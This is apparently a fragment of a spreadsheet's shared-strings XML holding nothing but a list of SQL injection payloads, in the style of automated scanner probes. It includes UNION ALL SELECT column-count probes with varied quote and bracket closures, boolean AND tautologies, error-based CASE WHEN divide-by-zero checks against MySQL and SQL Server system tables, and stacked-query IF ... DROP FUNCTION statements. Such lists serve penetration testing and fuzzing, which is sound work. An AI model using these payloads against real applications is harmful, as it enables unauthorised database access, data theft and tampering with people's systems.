    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL-- AND  ( 3462 = 3462</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( 5325 = 5325</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL-- AND   (  (  4387 = 4387</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  4178 = 4178</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  3496 = 3496</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( 5602 = 5602</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( 1698 = 1698</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( 5044 = 5044</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL-- AND  ( 'JPsw' = 'JPsw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL-- AND  ( 'PpuE' = 'PpuE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( 'QozT' = 'QozT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL-- AND   (  (  'BwHJ' = 'BwHJ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  'lxHS' = 'lxHS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( 'qmQq' = 'qmQq</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( 'wGuu' = 'wGuu</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL-- AND 'GakT' = 'GakT</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL-- AND 'Rorp' = 'Rorp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL-- AND 'jVKd' = 'jVKd</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL-- AND  ( 'KFdV' LIKE 'KFdV</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL-- AND  ( 'ioYq' LIKE 'ioYq</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL-- AND   (  (  'AxMD' LIKE 'AxMD</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  'HZPU' LIKE 'HZPU</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( 'uhFb' LIKE 'uhFb</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL-- AND 'WATO' LIKE 'WATO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL-- AND 'tRBg' LIKE 'tRBg</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL-- AND  ( "zJbY" = "zJbY</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL-- AND  ( "hMQh" = "hMQh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( "xBcp" = "xBcp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL-- AND   (  (  "KNpY" = "KNpY</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  "ozDg" = "ozDg</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( "mReh" = "mReh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( "nKXz" = "nKXz</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL-- AND "lYJx" = "lYJx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL-- AND "XYcL" = "XYcL</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL-- AND "DWYZ" = "DWYZ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL-- AND  ( "ajRs" LIKE "ajRs</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL-- AND  ( "WzWC" LIKE "WzWC</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL-- AND   (  (  "nKas" LIKE "nKas</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  "NMzL" LIKE "NMzL</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( "wcIH" LIKE "wcIH</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL-- AND "IanU" LIKE "IanU</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL-- AND "TEgs" LIKE "TEgs</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL-- AND  ( 3398 = 3398</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL-- AND  ( 7593 = 7593</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( 4318 = 4318</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( 4190 = 419</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL-- AND   (  (  1718 = 1718</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  4354 = 4354</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  4442 = 4442</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( 2149 = 2149</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( 7672 = 7672</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL-- AND  ( 'fMgm' = 'fMgm</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL-- AND  ( 'loeM' = 'loeM</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( 'Sube' = 'Sube</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL-- AND   (  (  'TtwN' = 'TtwN</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  'UlZh' = 'UlZh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( 'ABHW' = 'ABHW</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( 'yJUV' = 'yJUV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL-- AND 'qsXP' = 'qsXP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL-- AND 'XdxZ' = 'XdxZ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL-- AND 'Inid' = 'Inid</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL-- AND  ( 'eIQx' LIKE 'eIQx</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL-- AND  ( 'vcHh' LIKE 'vcHh</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL-- AND   (  (  'lYFU' LIKE 'lYFU</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  'IqIs' LIKE 'IqIs</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( 'iKCR' LIKE 'iKCR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL-- AND 'roWa' LIKE 'roWa</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL-- AND 'FMdJ' LIKE 'FMdJ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL-- AND  ( "MwLY" = "MwLY</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL-- AND  ( "SOYp" = "SOYp</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( "xcRO" = "xcRO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL-- AND   (  (  "Amhr" = "Amhr</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  "jifh" = "jifh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( "yYUN" = "yYUN</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( "XfxK" = "XfxK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL-- AND "UPXx" = "UPXx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL-- AND "Kggo" = "Kggo</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL-- AND "odTj" = "odTj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL-- AND  ( "SMxO" LIKE "SMxO</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL-- AND  ( "mfYH" LIKE "mfYH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL-- AND   (  (  "sgFU" LIKE "sgFU</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL-- AND   (  (  "dTJs" LIKE "dTJs</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL-- AND   (  (   ( "tAiS" LIKE "tAiS</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL-- AND "YKHS" LIKE "YKHS</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL-- AND "gXYa" LIKE "gXYa</t>
  </si>
  <si>
    <t xml:space="preserve">' )  ( "  )  )  " )   (  (  </t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 7563 = 9058</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 7372 = 7372</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 5831 = 5831</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 7983 = 7983</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  3194 = 3194</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  4531 = 4531</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  6151 = 6151</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 1186 = 1186</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 4275 = 4275</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 7946 = 7946</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 'pEon' = 'pEon</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 'fPHn' = 'fPHn</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 'XTHX' = 'XTHX</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  'XPkz' = 'XPkz</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  'vYpp' = 'vYpp</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  'sQTg' = 'sQTg</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 'cARZ' = 'cARZ</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 'qxzY' = 'qxzY</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 'bXKW' = 'bXKW</t>
  </si>
  <si>
    <t>,0x28 )  AND 'amls' = 'amls</t>
  </si>
  <si>
    <t>,0x28 )  AND 'REvJ' = 'REvJ</t>
  </si>
  <si>
    <t>,0x28 )  AND 'luiL' = 'luiL</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 'nDAr' LIKE 'nDAr</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 'yWRE' LIKE 'yWRE</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( 'nliS' LIKE 'nliS</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  'fPYM' LIKE 'fPYM</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  'OuzS' LIKE 'OuzS</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  'zDTD' LIKE 'zDTD</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 'kQgH' LIKE 'kQgH</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 'KzIk' LIKE 'KzIk</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( 'sfkG' LIKE 'sfkG</t>
  </si>
  <si>
    <t>,0x28 )  AND 'Fqdl' LIKE 'Fqdl</t>
  </si>
  <si>
    <t>,0x28 )  AND 'FuJb' LIKE 'FuJb</t>
  </si>
  <si>
    <t>,0x28 )  AND 'GZFY' LIKE 'GZFY</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( "Qkcg" = "Qkcg</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( "QBXJ" = "QBXJ</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( "zmAI" = "zmAI</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  "gkzI" = "gkzI</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  "htnl" = "htnl</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  "mGdJ" = "mGdJ</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( "OqXw" = "OqXw</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( "jQNw" = "jQNw</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( "vDxs" = "vDxs</t>
  </si>
  <si>
    <t>,0x28 )  AND "WvuD" = "WvuD</t>
  </si>
  <si>
    <t>,0x28 )  AND "tARs" = "tARs</t>
  </si>
  <si>
    <t>,0x28 )  AND "fFmt" = "fFmt</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( "BeRD" LIKE "BeRD</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( "lHzF" LIKE "lHzF</t>
  </si>
  <si>
    <t>,0x28 )  AND  ( "vCTT" LIKE "vCTT</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  "Nqnc" LIKE "Nqnc</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  "VKgA" LIKE "VKgA</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (  "QmLP" LIKE "QmLP</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( "DikB" LIKE "DikB</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( "LFZr" LIKE "LFZr</t>
  </si>
  <si>
    <t>,0x28 )  AND   (  (   ( "HbKw" LIKE "HbKw</t>
  </si>
  <si>
    <t>,0x28 )  AND "sdoU" LIKE "sdoU</t>
  </si>
  <si>
    <t>,0x28 )  AND "rGPm" LIKE "rGPm</t>
  </si>
  <si>
    <t>,0x28 )  AND "rlau" LIKE "rlau</t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 1/ ( SELECT 0 )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 4371* ( SELECT 4371 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 2662* ( SELECT 2662 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 5364* ( SELECT 5364 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 9784* ( SELECT 9784 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 2182* ( SELECT 2182 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 6061* ( SELECT 6061 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 5500* ( SELECT 5500 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 8275* ( SELECT 8275 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 4715* ( SELECT 4715 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 1/ ( SELECT 0 FROM DUAL )  END )  FROM DUAL ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE NULL END ) </t>
  </si>
  <si>
    <t xml:space="preserve">, ( SELECT  ( CASE WHEN  ( 8962 = 4905 )  THEN 1 ELSE 1/ ( SELECT 0 )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">, ( SELECT  ( CASE WHEN  ( 2528 = 2528 )  THEN 1 ELSE 1/ ( SELECT 0 )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">, ( SELECT  ( CASE WHEN  ( 876 = 1091 )  THEN 1 ELSE 1/ ( SELECT 0 )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 6376* ( SELECT 6376 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 1915* ( SELECT 1915 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 9110* ( SELECT 9110 FROM information_schema.tables )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 8928* ( SELECT 8928 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 4055* ( SELECT 4055 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 7416* ( SELECT 7416 FROM mysql.db )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 7787* ( SELECT 7787 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 5461* ( SELECT 5461 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ELSE 1739* ( SELECT 1739 FROM master..sysdatabases )  END  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  3649 = 6740 ) ,SELECT 3649,DROP FUNCTION yeIt ) ;--  AND  ( 4869 = 4869</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND  ( 2771 = 2771</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF  (  (  5914 = 7266 ) ,SELECT 5914,DROP FUNCTION aNTv ) ;--  AND  ( 3163 = 3163</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; IF  (  (  8680 = 3481 ) ,SELECT 8680,DROP FUNCTION EIxT ) ;--  AND   (  (  8774 = 8774</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (  8560 = 8560</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; IF  (  (  8290 = 6162 ) ,SELECT 8290,DROP FUNCTION CQUv ) ;--  AND   (  (  9359 = 9359</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; IF  (  (  4203 = 2964 ) ,SELECT 4203,DROP FUNCTION vOKB ) ;--  AND   (  (   ( 5052 = 5052</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (   ( 4365 = 4365</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; IF  (  (  7531 = 8023 ) ,SELECT 7531,DROP FUNCTION qNYG ) ;--  AND   (  (   ( 3038 = 3038</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  1797 = 5304 ) ,SELECT 1797,DROP FUNCTION dRXk ) ;--  AND  ( 'iPdZ' = 'iPdZ</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND  ( 'RVyH' = 'RVyH</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  1578 = 1722 ) ,SELECT 1578,DROP FUNCTION Rgvz ) ;--  AND  ( 'pDUw' = 'pDUw</t>
  </si>
  <si>
    <t>'  )  )  ; IF  (  (  6751 = 1101 ) ,SELECT 6751,DROP FUNCTION Xihi ) ;--  AND   (  (  'PiyQ' = 'PiyQ</t>
  </si>
  <si>
    <t>'  )  )  ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (  'dSQp' = 'dSQp</t>
  </si>
  <si>
    <t>'  )  )  ; IF  (  (  7248 = 1981 ) ,SELECT 7248,DROP FUNCTION YmQP ) ;--  AND   (  (  'zKWg' = 'zKWg</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF  (  (  9573 = 6860 ) ,SELECT 9573,DROP FUNCTION ZRKQ ) ;--  AND   (  (   ( 'JHWm' = 'JHWm</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (   ( 'qZVl' = 'qZVl</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF  (  (  8023 = 6495 ) ,SELECT 8023,DROP FUNCTION AFtG ) ;--  AND   (  (   ( 'AwZx' = 'AwZx</t>
  </si>
  <si>
    <t>'; IF  (  (  1894 = 3723 ) ,SELECT 1894,DROP FUNCTION rMbq ) ;--  AND 'ZwoC' = 'ZwoC</t>
  </si>
  <si>
    <t>'; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND 'mTIc' = 'mTIc</t>
  </si>
  <si>
    <t>'; IF  (  (  8313 = 2347 ) ,SELECT 8313,DROP FUNCTION cOLG ) ;--  AND 'LIaH' = 'LIaH</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  5353 = 259 ) ,SELECT 5353,DROP FUNCTION RhOp ) ;--  AND  ( 'Assz' LIKE 'Assz</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND  ( 'Ixnd' LIKE 'Ixnd</t>
  </si>
  <si>
    <t>' ) ; IF  (  (  7015 = 6336 ) ,SELECT 7015,DROP FUNCTION kRsL ) ;--  AND  ( 'clwQ' LIKE 'clwQ</t>
  </si>
  <si>
    <t>'  )  )  ; IF  (  (  4262 = 8323 ) ,SELECT 4262,DROP FUNCTION FvhP ) ;--  AND   (  (  'JIre' LIKE 'JIre</t>
  </si>
  <si>
    <t>'  )  )  ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (  'rpIm' LIKE 'rpIm</t>
  </si>
  <si>
    <t>'  )  )  ; IF  (  (  4658 = 1135 ) ,SELECT 4658,DROP FUNCTION vYPs ) ;--  AND   (  (  'FsxM' LIKE 'FsxM</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF  (  (  254 = 3920 ) ,SELECT 254,DROP FUNCTION keqp ) ;--  AND   (  (   ( 'skJX' LIKE 'skJX</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (   ( 'ouox' LIKE 'ouox</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF  (  (  3573 = 7421 ) ,SELECT 3573,DROP FUNCTION CYbg ) ;--  AND   (  (   ( 'oHkc' LIKE 'oHkc</t>
  </si>
  <si>
    <t>'; IF  (  (  6368 = 4202 ) ,SELECT 6368,DROP FUNCTION XMvv ) ;--  AND 'maLd' LIKE 'maLd</t>
  </si>
  <si>
    <t>'; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND 'VilK' LIKE 'VilK</t>
  </si>
  <si>
    <t>'; IF  (  (  8044 = 7263 ) ,SELECT 8044,DROP FUNCTION MxnO ) ;--  AND 'hvEB' LIKE 'hvEB</t>
  </si>
  <si>
    <t>" ) ; IF  (  (  4868 = 3845 ) ,SELECT 4868,DROP FUNCTION Nrgz ) ;--  AND  ( "rbBY" = "rbBY</t>
  </si>
  <si>
    <t>" ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND  ( "hSDT" = "hSDT</t>
  </si>
  <si>
    <t>" ) ; IF  (  (  4835 = 7417 ) ,SELECT 4835,DROP FUNCTION uOFg ) ;--  AND  ( "lket" = "lket</t>
  </si>
  <si>
    <t>"  )  )  ; IF  (  (  9313 = 4810 ) ,SELECT 9313,DROP FUNCTION pMVa ) ;--  AND   (  (  "bFnP" = "bFnP</t>
  </si>
  <si>
    <t>"  )  )  ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (  "xBMa" = "xBMa</t>
  </si>
  <si>
    <t>"  )  )  ; IF  (  (  2517 = 891 ) ,SELECT 2517,DROP FUNCTION sLHN ) ;--  AND   (  (  "bURv" = "bURv</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF  (  (  9853 = 4362 ) ,SELECT 9853,DROP FUNCTION DGjB ) ;--  AND   (  (   ( "KIhn" = "KIhn</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (   ( "aJBX" = "aJBX</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF  (  (  9382 = 1822 ) ,SELECT 9382,DROP FUNCTION sAYB ) ;--  AND   (  (   ( "SgDu" = "SgDu</t>
  </si>
  <si>
    <t>"; IF  (  (  6286 = 3569 ) ,SELECT 6286,DROP FUNCTION XYHF ) ;--  AND "HQAl" = "HQAl</t>
  </si>
  <si>
    <t>"; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND "HkUA" = "HkUA</t>
  </si>
  <si>
    <t>"; IF  (  (  7011 = 5295 ) ,SELECT 7011,DROP FUNCTION dreL ) ;--  AND "eSzZ" = "eSzZ</t>
  </si>
  <si>
    <t>" ) ; IF  (  (  8518 = 7968 ) ,SELECT 8518,DROP FUNCTION Wopg ) ;--  AND  ( "TNTp" LIKE "TNTp</t>
  </si>
  <si>
    <t>" ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND  ( "QwKR" LIKE "QwKR</t>
  </si>
  <si>
    <t>" ) ; IF  (  (  1802 = 6032 ) ,SELECT 1802,DROP FUNCTION jERe ) ;--  AND  ( "auZi" LIKE "auZi</t>
  </si>
  <si>
    <t>"  )  )  ; IF  (  (  3231 = 7444 ) ,SELECT 3231,DROP FUNCTION Cmxz ) ;--  AND   (  (  "msGj" LIKE "msGj</t>
  </si>
  <si>
    <t>"  )  )  ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (  "Naqr" LIKE "Naqr</t>
  </si>
  <si>
    <t>"  )  )  ; IF  (  (  1689 = 6718 ) ,SELECT 1689,DROP FUNCTION AcTl ) ;--  AND   (  (  "thno" LIKE "thno</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF  (  (  4260 = 7518 ) ,SELECT 4260,DROP FUNCTION MFwC ) ;--  AND   (  (   ( "nRXc" LIKE "nRXc</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND   (  (   ( "DMoJ" LIKE "DMoJ</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF  (  (  1453 = 4232 ) ,SELECT 1453,DROP FUNCTION LrRY ) ;--  AND   (  (   ( "RLva" LIKE "RLva</t>
  </si>
  <si>
    <t>"; IF  (  (  7212 = 794 ) ,SELECT 7212,DROP FUNCTION YgCB ) ;--  AND "sfxW" LIKE "sfxW</t>
  </si>
  <si>
    <t>"; IF  (  (  2540 = 2540 ) ,SELECT 2540,DROP FUNCTION UJSP ) ;--  AND "HXtp" LIKE "HXtp</t>
  </si>
  <si>
    <t>"; IF  (  (  2341 = 5482 ) ,SELECT 2341,DROP FUNCTION WHxT ) ;--  AND "acBM" LIKE "acBM</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF ( 8901 = 7746 )  SELECT 8901 ELSE DROP FUNCTION pvFV;-- AND  ( 9006 = 9006</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND  ( 9255 = 9255</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ; IF ( 6327 = 5763 )  SELECT 6327 ELSE DROP FUNCTION FDgy;-- AND  ( 5008 = 5008</t>
  </si>
  <si>
